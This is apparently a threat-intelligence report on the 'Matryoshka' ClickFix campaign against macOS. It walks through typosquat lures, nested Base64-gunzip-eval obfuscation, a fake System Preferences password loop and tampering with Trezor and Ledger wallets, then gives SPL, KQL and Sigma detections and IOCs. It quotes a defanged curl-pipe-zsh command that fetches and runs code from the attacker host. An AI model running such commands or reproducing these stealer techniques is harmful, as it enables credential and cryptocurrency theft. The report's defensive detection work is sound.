Matryoshka ClickFix macOS Variant — Nested Obfuscation, AppleScript Credential Stealer, and Crypto Wallet Hijacking

Threat ID: TL-2026-0120 | Severity: HIGH | Status: ACTIVE

Actor: Unattributed | Motivation: FINANCIAL

MITRE Techniques: 23 | Detections: 9 | CWEs: N/A

---

macOS is no longer the safe haven. Matryoshka nests inside ClickFix campaigns, chaining user deception with multi-stage payloads that bypass Gatekeeper entirely. No exploit needed. Just a clipboard and a Terminal window.

Intego Antivirus Labs disclosed this macOS-targeting ClickFix variant in February 2026 — named "Matryoshka" for its nesting-doll obfuscation layers. The campaign chains typosquatting, traffic distribution system redirects, and a Terminal paste-this-fix lure to deliver a heredoc-encoded shell script that decodes entirely in memory through a Base64-gunzip-eval pipeline. The final payload is an AppleScript stealer that phishes macOS credentials through a fake System Preferences dialog loop, replaces Trezor Suite wholesale, surgically patches Ledger Live's Electron archive, and exfiltrates everything through an API-gated C2 requiring a custom header for payload delivery. Below: the full infection chain, each obfuscation layer unpacked, and production detection queries for SPL, KQL, and Sigma.

Cyber Security News coverage of the new Matryoshka ClickFix variant attacking macOS users through typosquatted domains to deploy stealer malware.

Executive Summary

• What: macOS ClickFix variant using nested heredoc obfuscation (Base64+gunzip+eval in memory) to deliver an AppleScript stealer targeting browser credentials and cryptocurrency wallets (Trezor Suite, Ledger Live)
• Who: Unattributed financially motivated actor; campaign discovered by Intego Antivirus Labs in February 2026
• Impact: Complete credential compromise via fake System Preferences dialog; Trezor Suite deleted and replaced with trojanized build; Ledger Live surgically patched via app.asar replacement with ad-hoc re-signing; all data staged to /tmp/osalogging.zip and exfiltrated
• Status: Active since February 2026; builds on macOS ClickFix lineage traced to mid-2024
• Detection: 9 production-ready detections available on Threadlinqs Intelligence

Technical Analysis

Layer by Layer

Open the first doll, find another inside. Matryoshka's distinguishing characteristic is its layered obfuscation pipeline, where each stage unwraps to reveal the next — with no intermediate artifacts written to disk. Every layer peels back to expose the payload beneath, and nothing ever touches the filesystem.

Stage 0 — Clipboard Injection. The victim visits comparisions[.]org, a typosquat of comparisons.org. A TDS redirect through macfilesendstream[.]com delivers a fake error page instructing the user to "fix" an issue by pasting a command into Terminal. The clipboard is pre-loaded with a curl-pipe-zsh one-liner targeting barbermoo[.]xyz.

Stage 1 — Heredoc Wrapper. The fetched script (rogue.sh) contains a heredoc-encoded payload that decodes through an in-memory pipeline: base64 -D | gunzip | eval. No decoded content touches the filesystem. This is the "Matryoshka wrapper" — the outer doll that conceals everything within.

Stage 2 — API-Gated Loader. The decoded loader detaches to the background, suppresses all output to /dev/null, and contacts the C2 with a custom header (api-key: 5190ef17...). Sandboxes get nothing. Without the correct header, the C2 returns an empty response — the operator only delivers the drop to verified victims. The user sees their Terminal prompt return immediately, believing the process completed normally.

Stage 3 — AppleScript Stealer. On successful handshake, the C2 delivers an AppleScript payload with three targeting modules.

Credential Phishing Loop

The AppleScript spawns a fake "System Preferences" dialog requesting the user's password. If the user cancels, the dialog reappears. This loop continues until credentials are entered — a persistence technique that exploits macOS user conditioning to authenticate through system dialogs. The display dialog command uses the hidden answer parameter to mask input, mimicking legitimate macOS password prompts.

Wallet Hijacking: Two Approaches

Trezor Suite gets the blunt approach. Kill the process. Delete the app. Download a trojanized replacement from the C2. The replacement mirrors the legitimate application's appearance and functionality while quietly pulling wallet data out.

Ledger Live gets the scalpel. Rather than replacing the entire application, the stealer modifies only the Electron app.asar archive within the bundle — the core application logic — then performs ad-hoc code signing to suppress macOS integrity warnings. The legitimate shell stays intact. The credential-harvesting code sits underneath, intercepting wallet operations. What makes this approach dangerous is that file integrity checks on the outer application bundle pass cleanly — only the inner archive is dirty.

Why Gatekeeper Doesn't Help

Gatekeeper bypassed. Payload runs. The Terminal paste vector sidesteps macOS security entirely — Gatekeeper, notarization checks, and quarantine attributes all assume a download-and-launch model. Commands pasted directly into Terminal skip every one of those gates. Same architectural weakness ClickFix exploits on Windows through the Run dialog. Apple can't patch this without breaking standard workflows.

Attack Chain

1. Resource Development — Attacker registers typosquat domain (comparisions[.]org), configures TDS infrastructure, and stages payloads on barbermoo[.]xyz (T1583.001, T1608.001)
2. Initial Access — Victim visits typosquat; TDS redirects to lure page with fake error dialog and clipboard-injected Terminal command (T1566.002)
3. Execution — Victim pastes curl -fsSL hxxp://barbermoo[.]xyz/curl/[TOKEN] | zsh into Terminal; heredoc payload decodes in memory (T1204.001, T1059.004, T1027)
4. Defense Evasion — Background detachment, output suppression, API-gated C2, in-memory-only execution, fake error message misdirection (T1480, T1564.003, T1140)
5. Credential Access — AppleScript spawns fake System Preferences dialog loop capturing user password; browser credential stores harvested (T1056.002, T1555.003)
6. Impact — Trezor Suite replaced with trojanized build; Ledger Live app.asar patched and ad-hoc re-signed (T1565.001, T1553.002)
7. Exfiltration — All stolen data archived to /tmp/osalogging.zip and POSTed to C2 /gate endpoint with API key header (T1560.001, T1041)

GBHackers analysis of the Matryoshka ClickFix variant — named for its Russian nesting doll-like layers of obfuscation targeting macOS Terminal.

Threat Actor Profile

No attribution yet. Financial motivation is obvious from the crypto wallet targeting. The campaign demonstrates deep familiarity with macOS internals — Electron application architecture, code signing mechanics, and AppleScript dialog APIs — pointing to a specialized macOS malware developer or team. The broader ClickFix macOS ecosystem has been linked to Russian-speaking operators in adjacent campaigns (CloudSEK documented a Spectrum-themed AMOS variant distributed by Russian-speaking hackers), though direct attribution for Matryoshka has not been established.

What caught our attention was the operational maturity. macOS users aren't immune. Microsoft Defender Experts documented a broader trend of macOS infostealers using ClickFix-style social engineering throughout late 2025 and early 2026, including DigitStealer, MacSync, and Atomic macOS Stealer (AMOS). Matryoshka fits within this wave but distinguishes itself through the nesting-doll obfuscation pipeline and surgical wallet patching — the app.asar technique in particular is not something we've seen in other ClickFix variants.

Detection

Threadlinqs Intelligence provides 9 production-ready detection rules for this threat across macOS endpoint telemetry.

Splunk SPL

This query hunts for the primary macOS ClickFix infection vector: curl piped to shell execution from Terminal, with enrichment for known Matryoshka C2 infrastructure and staging artifacts.

SPLindex=osquery OR index=crowdstrike_falcon sourcetype=osquery:results OR sourcetype=crowdstrike:event
| where (process_name="zsh" OR process_name="bash") AND parent_name="Terminal"
| search process_cmdline="curl|zsh" OR process_cmdline="curl|bash"
| eval known_c2=if(match(process_cmdline, "barbermoo|macfilesendstream|comparisions"), 1, 0)
| eval heredoc_decode=if(match(process_cmdline, "base64.-D.gunzip|gunzip.base64"), 1, 0)
| eval staging_artifact=if(match(process_cmdline, "osalogging"), 1, 0)
| eval risk_score=known_c250 + heredoc_decode30 + staging_artifact40
| where risk_score >= 30 OR match(process_cmdline, "curl.\\|.(zsh|bash)")
| stats count, values(process_cmdline) as commands, values(risk_score) as scores by host, user
| where count > 0
| sort -risk_score

We're looking for both generic curl-pipe-shell execution (the common ClickFix pattern) and Matryoshka-specific indicators — known C2 domains and heredoc decode patterns. Platform data shows this query catches the full infection chain with minimal false positives outside of legitimate developer tooling installs.

Microsoft KQL

Catching credential phishing and wallet tampering across five detection surfaces in Defender for Endpoint:

KQLlet wallet_apps = dynamic(["Trezor Suite.app", "Ledger Live.app"]);
let c2_domains = dynamic(["barbermoo.xyz", "macfilesendstream.com", "comparisions.org"]);
union
(
    DeviceProcessEvents
    | where Timestamp > ago(24h)
    | where FileName == "osascript"
    | where ProcessCommandLine has_all ("display dialog", "hidden answer")
    | extend AlertType = "credential_phishing_dialog"
),
(
    DeviceFileEvents
    | where Timestamp > ago(24h)
    | where FolderPath has "/Applications/" and FileName has_any (wallet_apps)
    | where ActionType in ("FileDeleted", "FileModified", "FileCreated")
    | extend AlertType = "wallet_tampering"
),
(
    DeviceFileEvents
    | where Timestamp > ago(24h)
    | where FileName == "app.asar"
    | where FolderPath has "Ledger Live"
    | extend AlertType = "ledger_asar_patch"
),
(
    DeviceProcessEvents
    | where Timestamp > ago(24h)
    | where FileName == "codesign"
    | where ProcessCommandLine has "--force" and ProcessCommandLine has "--sign"
    | where InitiatingProcessFileName != "Xcode"
    | extend AlertType = "adhoc_codesign"
),
(
    DeviceFileEvents
    | where Timestamp > ago(24h)
    | where FileName == "osalogging.zip"
    | where FolderPath has "/tmp/"
    | extend AlertType = "matryoshka_staging"
)
| project Timestamp, DeviceName, AlertType, FileName, FolderPath, ProcessCommandLine
| sort by Timestamp desc

Five detection surfaces in one union: AppleScript credential phishing, wallet application deletion or modification, Ledger Live app.asar patching, ad-hoc code signing from non-Xcode processes, and the Matryoshka staging archive. Our analysis found that the app.asar modification alert is the highest-fidelity signal — legitimate Ledger updates do not modify this file in-place.

Sigma

Flagging Terminal fetch-and-execute patterns tied to ClickFix campaigns via Sigma:

SIGMAtitle: macOS Terminal curl Piped to Shell — ClickFix Fetch-and-Execute
id: 7d4e2b89-a1c6-4f38-9e75-2b8d1c3a5f67
status: experimental
description: Detects curl output piped to zsh or bash from Terminal, indicating ClickFix-style social engineering infection on macOS
references:
    - https://intel.threadlinqs.com/#TL-2026-0120
    - https://www.intego.com/mac-security-blog/matryoshka-clickfix-macos-stealer/
author: Threadlinqs Intelligence
date: 2026/02/22
tags:
    - attack.execution
    - attack.t1059.004
    - attack.t1204.001
    - attack.initial_access
    - attack.t1566.002
logsource:
    category: process_creation
    product: macos
detection:
    selection_curl_pipe:
        ParentImage|endswith: '/Terminal'
        CommandLine|contains|all:
            - 'curl'
            - '|'
        CommandLine|contains:
            - 'zsh'
            - 'bash'
            - 'sh'
    selection_known_infra:
        CommandLine|contains:
            - 'barbermoo'
            - 'macfilesendstream'
            - 'comparisions'
    selection_heredoc:
        CommandLine|contains|all:
            - 'base64'
            - 'gunzip'
            - 'eval'
    condition: selection_curl_pipe or selection_known_infra or selection_heredoc
falsepositives:
    - Homebrew installation (brew.sh)
    - rustup, nvm, and developer tool installers
    - IT provisioning scripts using curl|bash pattern
level: high

Browse all 9 detection rules for this threat: View on Threadlinqs Intelligence

Intego Mac Security Blog unpacking the Matryoshka ClickFix campaign — typosquatting + heredoc obfuscation delivering macOS credential stealers via AppleScript.

Indicators of Compromise

Network Indicators

Type	Indicator	Context
Domain	comparisions[.]org	Typosquatting entry point (mimics comparisons.org)
Domain	barbermoo[.]xyz	Primary C2 and payload delivery
Domain	macfilesendstream[.]com	TDS redirect infrastructure
URL	/gate endpoint	Exfiltration endpoint on C2
Header	api-key: 5190ef17...	Required custom header for C2 handshake

File Indicators

Type	Indicator	Context
SHA256	62ca9538889b767b1c3b93e76a32fb4469a2486cb3ccb5fb5fa8beb2dd0c2b90	Observed Matryoshka sample
SHA256	d675bff1b895b1a231c86ace9d7a39d5704e84c4bc015525b2a9c80c39158338	Wrapper script (rogue.sh)
SHA256	48770b6493f2b9b9e1d9bdbf482ed981e709bd03e53885ff992121af16f76a09	Decompressed loader
File Path	/tmp/osalogging.zip	Staging archive for stolen data
File	rogue.sh	Fetched shell script (heredoc wrapper)
File	app.asar (modified)	Ledger Live patched Electron archive

Behavioral Indicators

• curl output piped to zsh or bash from Terminal application
• osascript spawning repeated "System Preferences" dialogs with hidden answer fields
• Trezor Suite process termination followed by application deletion and replacement
• Ledger Live app.asar modification followed by codesign --force --sign - operations
• /tmp/osalogging.zip creation followed by HTTP POST to external domain
• Background process detachment with stdin/stdout/stderr redirected to /dev/null
• Final display of "Your Mac does not support this application" error message

Timeline

Date	Event
2024-06-01	ClickFix technique emerges, primarily targeting Windows with fake CAPTCHAs and copy-paste PowerShell
2025-06-01	Intego documents fake Arc Browser with AppleScript stealer component, establishing macOS credential theft viability
2025-11-01	ClickFix campaigns add instruction videos targeting macOS users via Terminal paste technique
2026-02-01	Matryoshka campaign observed in the wild using typosquatted comparisions[.]org with TDS redirect
2026-02-02	Microsoft Defender Experts publishes macOS infostealer report covering ClickFix-style campaigns
2026-02-12	Intego Antivirus Labs publishes detailed technical analysis of nested obfuscation, API-gated C2, and wallet targeting
2026-02-16	Cyber Security News and SOC Prime publish coverage confirming Intego findings

MITRE ATT&CK Mapping

Tactic	Technique	ID	Context
Initial Access	Phishing: Spearphishing Link	T1566.002	Typosquatting lure redirecting to fake error page
Execution	User Execution: Malicious Link	T1204.001	Victim pastes Terminal command from clipboard
Execution	AppleScript	T1059.002	Stealer payload and credential phishing dialog
Execution	Unix Shell	T1059.004	curl-pipe-zsh execution, heredoc decode
Defense Evasion	Obfuscated Files or Information	T1027	Nested heredoc Base64+gunzip encoding
Defense Evasion	Deobfuscate/Decode Files	T1140	In-memory decode pipeline
Defense Evasion	Execution Guardrails	T1480	API-gated C2 requiring custom header
Defense Evasion	Hidden Window	T1564.003	Background detachment, output suppression
Defense Evasion	Code Signing	T1553.002	Ad-hoc re-signing of patched Ledger Live
Credential Access	GUI Input Capture	T1056.002	Fake System Preferences password dialog loop
Credential Access	Credentials from Web Browsers	T1555.003	Browser credential store harvesting
Collection	Archive Collected Data	T1560.001	/tmp/osalogging.zip staging
Exfiltration	Exfiltration Over C2 Channel	T1041	POST to /gate endpoint with API key
Impact	Stored Data Manipulation	T1565.001	Trezor Suite replacement, Ledger Live patching

Full MITRE ATT&CK mapping with 23 techniques: View coverage on Threadlinqs

TL-2026-0120 on Threadlinqs Intelligence — Matryoshka ClickFix macOS variant with nested heredoc obfuscation, AppleScript execution, and 12/12 detection coverage.

Recommendations

1. User awareness training — macOS users must understand that legitimate software never requires pasting commands into Terminal; this is the single most effective control against all ClickFix variants
2. Block known infrastructure — sinkhole comparisions[.]org, barbermoo[.]xyz, and macfilesendstream[.]com at DNS or proxy level
3. Monitor wallet application integrity — deploy file integrity monitoring on Trezor Suite and Ledger Live application bundles; alert on app.asar modifications and non-Xcode codesign operations
4. Hunt for staging artifacts — search endpoints for /tmp/osalogging.zip and curl-pipe-shell patterns in Terminal process logs
5. Enforce macOS security controls — deploy MDM application allowlisting; restrict osascript execution from shell contexts; store cryptocurrency recovery phrases offline and never on networked systems

References

• Intego: Unpacking the New Matryoshka ClickFix Variant — Intego, February 2026
• Cyber Security News: New ClickFix Variant Matryoshka Attacking Users — Cybersecurity News, February 2026
• GBHackers: Matryoshka Clickfix Variant Targets macOS Users — GBHackers, February 2026
• SOC Prime: Matryoshka ClickFix Typosquat macOS Stealer Chain — SOC Prime, February 2026
• Microsoft: Infostealers Without Borders — macOS, Python Stealers, and Platform Abuse — Microsoft Security Blog, February 2026
• CloudSEK: AMOS Variant Distributed via ClickFix by Russian-Speaking Hackers — CloudSEK
• Intego: Fake Arc Browser with AppleScript Component — Intego, June 2025
• MITRE ATT&CK: T1059.002 — AppleScript — MITRE
• MITRE ATT&CK: T1056.002 — GUI Input Capture — MITRE
• MITRE ATT&CK: T1565.001 — Stored Data Manipulation — MITRE

---

Full threat intelligence, detection rules, and IOC feeds are available on Threadlinqs Intelligence. Track this threat: TL-2026-0120.